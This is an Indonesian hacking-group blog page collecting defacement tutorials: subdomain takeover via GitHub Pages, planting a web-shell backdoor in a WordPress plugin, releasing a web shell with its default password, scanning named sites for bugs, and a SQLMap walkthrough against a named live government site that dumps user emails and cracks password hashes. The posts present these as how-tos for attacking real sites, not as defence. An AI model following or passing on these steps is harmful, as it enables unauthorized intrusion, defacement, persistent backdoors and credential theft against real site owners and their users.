Tampilkan postingan dengan label Deface. Tampilkan semua postingan


oke gays gw kali ini bikin tutor mengenai subdomain takeover kebetulan member-member GSH pada penasaran gimana proses nya awal nya gw membaca artikel ini : https://www.hackerone.com/blog/Guide-Subdomain-Takeovers awal nya gw rada bingung namun 1 jam gw praktek dan akhirnya nemu deh trik nya wkwkwkwkwkwkwk

kenapa bisa terjadi subdomain takeover ini ?

sebelum nya si pemilik web pernah bikin subdomain yang digunakan untuk github page namun mungkin karena udah gak lanjut lagi ya github page nya dihapus sedangkan subdomain nya gak dihapus

oke langsung saja kita mulai ya kebetulan gw dapat nih bahan percobaan pertama adalah tanda-tanda subdomain itu vuln Github Custom Page Subdomain Takeover adalah seperti ini tanda 404 semua pada ngira 404 itu gak ada barang nya ya kan.

oke sebelum eksekusi pastikan kalian sudah punya akun github ya


setelah kalian login akun github nya klik New Repository


masukkan subdomain target nya sebagai nama repository nya lalu checklist bagian Intilialize this repository with a README setelah itu klik Create repository 

kemudian create new file


buat file nama nya index.html lalu isi dengan script depes contoh seperti gambar dibawah ini


kemudian klik commit new file

trus klik settings


pada bagian Github pages nya di sisi Source nya klik master branch lalu klik save lebih jelas nya liat gambar dibawah ini.


kemudian custom domain nya isi subdomain target tadi kemudian klik save


jika muncul seperti ini berarti sudah selesai setting nya


dan kalo berhasil ya muncul deh halaman depes nya wkwkwkwk ini ada Ucing Kuning lagi ngeganja


oke cukup mudah kan wkwkwkwkk solusi nya ya record DNS yang mengarah ke github itu ya dihapus di bagian control panel domain registrar nya.

oke cukup sampai disini aja sekian dan terimakasih.

Cara Subdomain Takeover Melalui Github Page


Setelah sekian lama saya tidak melakukan defacing, iseng iseng saya cari exploit dan langsung saya share sajah buat kalian yang ingin belajar deface. method php file manager upload shell
Note : Maaf Suaaranya Terbata Bata
Jangan Lupa Subscribe Juga Channelnya
By : E7B_404
From : Channel 4Sekawan
Team : Garuda Security Hacker



Garuda Security Hacker Official Team



Official Website Portal : Garuda Security Hacker | Official Website Portal
Official Fanspage : Garuda Security Hacker | Official Fanspage
Official Channel YouTube : Garuda Security Hacker | Official Channel

DEFACE METODE PHP FILE MANAGER UPLOAD SHELL




hai para hacker dan yang mau belajar jadi hacker kali ini sang mastah kita lagi turun gunung ne ya benar E7B-404 membuat video tutorial Deface Metode CFFM File Manager tonton dan pelajari aja video nya ya




Garuda Security Hacker Official Team



Official Website Portal : Garuda Security Hacker | Official Website Portal
Official Fanspage : Garuda Security Hacker | Official Fanspage
Official Channel YouTube : Garuda Security Hacker | Official Channel

Video Tutorial Deface Metode CFFM File Manager by E7B_404

 Hello gue E7B_404 dah lama gak bikin tutor dan kali ini gue ketitipan amanat baut bikin tutorial
Deface Metode IP Forwading, Port dan Protocol Forward Di Windows, buat klian pecinta linux silkn baca (Deface Metode IP Forwading, Port dan Protocol Forward Di Linux)

 Lu download dulu Ngrok nya buat pesugihan kali ini  silakan download di https://ngrok.com/download kalo udah download lu exrta filenya dimana ajah terserah lu. gue extra di  D ,
kalu udah di exrta bukan CMD via admin, dan lu pergi ke tempat dimna lu naro ngrok.
Selanjutnya jalanin dulu XAMPP / Localhost, centang cukup pada apache sajah gan


Taro file deface lu di localhost dulu dengan nama index.html biar nanti indenya ke tebas, sekarang kalo udah lu ketik ngrok http 80 .

Selanjutnya tekan enter dan biarkan hingga connecting, kalo udah dan berhasil muncul ke gini gan


Lu copy yang gue blo, dan selanjutnya lu buka link tersebut di adres bar dan taraaaa

Cukup sekian tutor dari kami dan thanks buat Fay :) :* cker Official Team


Official Fanspage : Garuda Security Hacker | Official Fanspage
Official Channel YouTube : Garuda Security Hacker | Official Channel

Deface Metode IP , Port dan Protocol Forward Di Windows

Deface dengan Metode IP, Port dan Protocol Forward


_Tuan2Fay_ | Garuda Security Hacker ~ Sebelumnya maaf buat para defacer pro, soalnya kali ini gw bikin tutorial Deface,, ya bisa di bilang ini fake deface, sama kek DNS Afraid yg sempat booming waktu itu. gw bikin tutorial ini bukan buat spam setoran mirror defacement. ini cuma pembelajaran tentang "Forwarding IP, Port dan Protocol"
Ok langsung aja dah kita ke materi

Bahan-Bahan :

Bukan bacol mz -_-

1. Apache Server ( buat si Penguin ) kalo si jendela pake XAMPP

2. Ngrok

3. Script Deface.

Step by Step :

1. Kalo belum ada Apache Server,, silahkan di Install dlu ya :) (cari tutorial di gugel)

2. Register Ngrok => Ngrok

Deface dengan Metode IP, Port dan Protocol Forward

tinggal ikutin aja step-step registernya

3. Setelah itu lu login ke akun ngrok !!

4. Download ngrok nya sesuai kebutuhan.. (ane pake yg buat Linux 32bit)

Deface dengan Metode IP, Port dan Protocol Forward


5. Selesai download,, tinggal di unzip aja Ngroknya.. (udah tau kan ? klo blm cari di gugel aja)

6. Beres di unzip, kita pindahin dlu Ngroknya biar gampang di panggilnya
buka terminal.
# sudo su
# mv ngrok /usr/bin/

7. Kita install authtoken ngroknya dlu.
# ngrok authtoken token_ente

Deface dengan Metode IP, Port dan Protocol Forward


Deface dengan Metode IP, Port dan Protocol Forward

8. Beres install authtoken, kita start service apache servernya
buka terminal -> login root (kalo udh kaga usah login lagi kntl)
# service apache2 start

9. Baru kita start ngroknya,,
# ngrok http 80
Note : 80 adalah port default apache

10 . Kalo sukses bakalan kek gambar ↓

11. Kita akses domainnya, yg itu tuh : http://blablabla.ngrok.io

Deface dengan Metode IP, Port dan Protocol Forward

Lohh dmna depesnya ?? Ngotak dikit kntl!!

12. Copy script deface kamu ke /var/www/html/ ← Direktori web server apache

13. Tinggal di akses dah,, http://blablabla.ngrok.io/script.ext

Deface dengan Metode IP, Port dan Protocol Forward

14. Terserah lu mau di apain..

kalo kaga ngerti tinggal komen aja ya kntl !! atau chat ke FP GSH
Note :
Tutorial buat pengguna jendela bajakan menyusul..



Garuda Security Hacker Official Team



Official Fanspage : Garuda Security Hacker | Official Fanspage
Official Channel YouTube : Garuda Security Hacker | Official Channel

Deface dengan Metode IP, Port dan Protocol Forward

Tutorial Tanam Shell Backdoor di WordPress tanpa merusak Plugins dan Themes

Tutorial Tanam Shell Backdoor di WordPress tanpa merusak Plugins dan Themes

_Tuan2Fay_ | Garuda Security Hacker ~ heii kuyy,, apa kabar ?? masih depes2an ?? hati2 yee,, ntar tercyduck :v. ok masuk ke topik.
Biasanya para depeser kalau tanam shell di wordpress pasti ngereplace source code plugin/theme, sebaiknya jgn terlalu brutal lah klo depes itu kasian admin -_- apa lagi yg di depes website lokal. main lah sedkit lebih rapih :) makanya gw bikin tutorial ini,,

Bahan-Bahan :

bukan bahan buat lu ngocok koplak :v
1. Plugin WordPress
Plugin nya bisa di donlot di => Sini
Cari aja yg sizenya kecil

2. Shell Backdoor
kalo belum punya bisa pake => x48x Web Shell

Step by Step :

1. Masukin dlu shell nya ke Archive plugins..

Tutorial Tanam Shell Backdoor di WordPress tanpa merusak Plugins dan Themes

2. Login WordPress dlu..

3. Setelah login lanjut ke menu Plugins -> Add New -> Upload Plugin

Tutorial Tanam Shell Backdoor di WordPress tanpa merusak Plugins dan Themes

4. Upload File Plugin yg tadi dah di susupi shell backdoor
5. Kalo Sukses hasilnya begini ↓

Tutorial Tanam Shell Backdoor di WordPress tanpa merusak Plugins dan Themes

6. Tinggal di Panggil dah plugin yg dah lu upload terus akses shellnya
contoh :
site.crot/wp-content/plugins/namaplugins/shellkamu.php

Tutorial Tanam Shell Backdoor di WordPress tanpa merusak Plugins dan Themes

Shell gw namanya k3.php :)

Done,, simple kan.. kaga ada plugins yg di rusak.. supaya kaga nyusahin webmaster


Garuda Security Hacker Official Team



Official Fanspage : Garuda Security Hacker | Official Fanspage
Official Channel YouTube : Garuda Security Hacker | Official Channel

Tutorial Tanam Shell Backdoor di WordPress tanpa merusak Plugins dan Themes


hai para hacker biasa dan hacker mastah yang skill nya sampe bisa bikin matahari terbit dari timur :v

kali ini gw mau share tool online yang lumayan enak bin kamprett cocok buat lu yang suka ngajukan proposal ala anak ormas ke admin-admin web pengguna wordpress wkwkwkwkwkwkwk.

tool ini beralamat di http://wpscans.com untuk menggunakan nya lu kagak perlu pake skill hacker lu yang bisa bikin matahari terbit dari timur itu :v

cukup buka http://wpscans.com dari browser lu pade lalu masukkan url situs yang mau diuji misal nya http://jokowi.co.id ( maafkan rakyat mu yang nakal ini pak ) kemudian tekan tombol start scan now



 biarkan proses scanning berjalan dengan baik


sabar coyyy


dan hasil scan nya keluar ternyata web nya ada bug nya 


tuh keliatan jelas bug nya ada di plugin dan theme apa 


 dan informasi tentang kekurangan website yang discan tadi keliatan detail nya




nah khusus buat lu admin wordpress rajin-rajin aja scan website yang lu urus pake http://wpscans.com ini jadi lu tau dimana kelebihan dan kekurangan nya.

sekian dan terimakasih.


Garuda Security Hacker Official Team



Official Fanspage : Garuda Security Hacker | Official Fanspage
Official Channel YouTube : Garuda Security Hacker | Official Channel

Scan Bug Wordpress Dengan Wpscans.com Secara Online

[SHELL] x48x Web Shell

[SHELL] x48x Web Shell


_Tuan2Fay_ | blog.garudasecurityhacker.org - setelah sebelumnya ane ngerilis mini shell, skrng ane rilis versi anunya (entahlah :v).
pada dasarnya shell ini cuma mengambil function dan tool dari shell yg udah ada sebelumnya,, ini cuma kerjaan ane saat iseng2 aja :v jadi mohon maaf klo tercyduck banyak kekurangannya :( :(

Fitur :

Fitur jg ga banyak2 amat,, ane masukin yg sering di pake sama orang2 aja :v
sama ane modif dikit fitur login nya..
Untuk lebih detail nya cek sendiri aja ya :p

Tampilan :

[SHELL] x48x Web Shell
Sebelum Tercyduck

[SHELL] x48x Web Shell
Sesudah Tercyduck

[SHELL] x48x Web Shell
Sesudah Tercyduck dan Login

Note :
  • Buat munculin form loginnya tinggal di tambahin ?ez=login contoh : x48x.php?ez=login
  • Default passwordnya : melodynl (bisa di ganti sendiri)

Link : Pasted.co



Garuda Security Hacker Official Team



Official Fanspage : Garuda Security Hacker | Official Fanspage
Official Channel YouTube : Garuda Security Hacker | Official Channel

[SHELL] x48x Web Shell


Yo kembali lagi bersama gw yukinoshita 47 kali ini gw mau sharing tutorial tentang SQL Map banyak jg sih yg request sampe bosan gw denger nya wkwkwkwkwk.

oke kali ini live target tutorial nya http://dev2.kopertis7.go.id seperti gambar dibawah ini bug nya terletak di http://dev2.kopertis7.go.id/gallery_info.php?id=35


masukkan perintah

root@yukinoshita47:~# sqlmap -u http://situstarget.com --dbs

contoh :
root@yukinoshita47:~# sqlmap -u http://dev2.kopertis7.go.id/gallery_info.php?id=35 --dbs


biarkan tool nya berjalan seperti gambar dibawa ini


jika muncul persetujuan buat lanjutkan eksekusi ketik y terus tekan enter seperti gambar dibawah ini




jika berhasil maka akan muncul seperti gambar dibawah ini :

lalu untuk melihat tabel dari database tersebut eksekusi perintah

root@yukinoshita47:~# sqlmap -u http://situstarget.com -D namadatabase --table

contoh
root@yukinoshita47:~# sqlmap -u http://dev2.kopertis7.go.id/gallery_info.php?id=35 -D kopertisdb --table


kemudian tekan enter maka akan muncul seperti gambar dibawah ini.

selanjut nya untuk melihat isi dari tabel tersebut perintahnya adalah

root@yukinoshita47:~# sqlmap -u http://situstarget.com -D namadatabase --columns

contoh :
root@yukinoshita47:~# sqlmap -u http://dev2.kopertis7.go.id/gallery_info.php?id=35 -D kopertisdb --columns

kemudian tekan enter maka akan muncul seperti gambar dibawah ini.

setelah itu kolom-kolom dari tabel database tersebut akan kelihatan seperti gambar dibawah ini.

untuk melihat isi dari kolom dan tabel tadi adalah menggunakan perintah.

root@yukinoshita47:~# sqlmap -u http://situstarget.com -D namadatabase -T namatabel -C namakolom --dump

contoh
root@yukinoshita47:~# sqlmap -u http://dev2.kopertis7.go.id/gallery_info.php?id=35 -D kopertisdb -T users -C email,password,user_id,username --dump

 kemudian tekan enter dan akan muncul seperti gambar dibawah ini sqlmap akan meminta persetujuan untuk menggunakan tools lainnya disini saya iya kan dengan menekan y dan kemudian tekan enter

kemudian muncul lagi persetujuan untuk menggunakan metode dictionary attack atau bruteforce tekan aja y kemudian tekan enter.

kemudian ada 3 pilihan

- 1 menggunakan wordlist default bawaan sqlmap
- 2 menggunakan wordlist custom
- 3 menggunakan file wordlist

disini saya pilih aja default dengan menekan 1 kemudian tekan enter

kemudian akan muncul seperti gambar dibawah ini kali ini tergantung keinginan saja disini saya pilih tidak dengan menekan n kemudian tekan enter

biarkan sqlmap crack hash password nya

jika berhasil akan muncul seperti gambar dibawah ini.



oke untuk mencari dimana login nya ya seperti biasa kalian cari aja pake admin finder :p

untuk log pentest dari SQLMap di tutorial ini  klik disini

oke cukup sampe disini tutorial nya sekian dan terimakasih


Garuda Security Hacker Official Team



Official Fanspage : Garuda Security Hacker | Official Fanspage
Official Channel YouTube : Garuda Security Hacker | Official Channel

Kali Linux : SQL Injection dan Auto Crack Hash Password Dengan SQLMap

- Copyright © Family Cyber Exploit - Blogger Templates - Powered by Blogger - Designed by Johanes Djogan -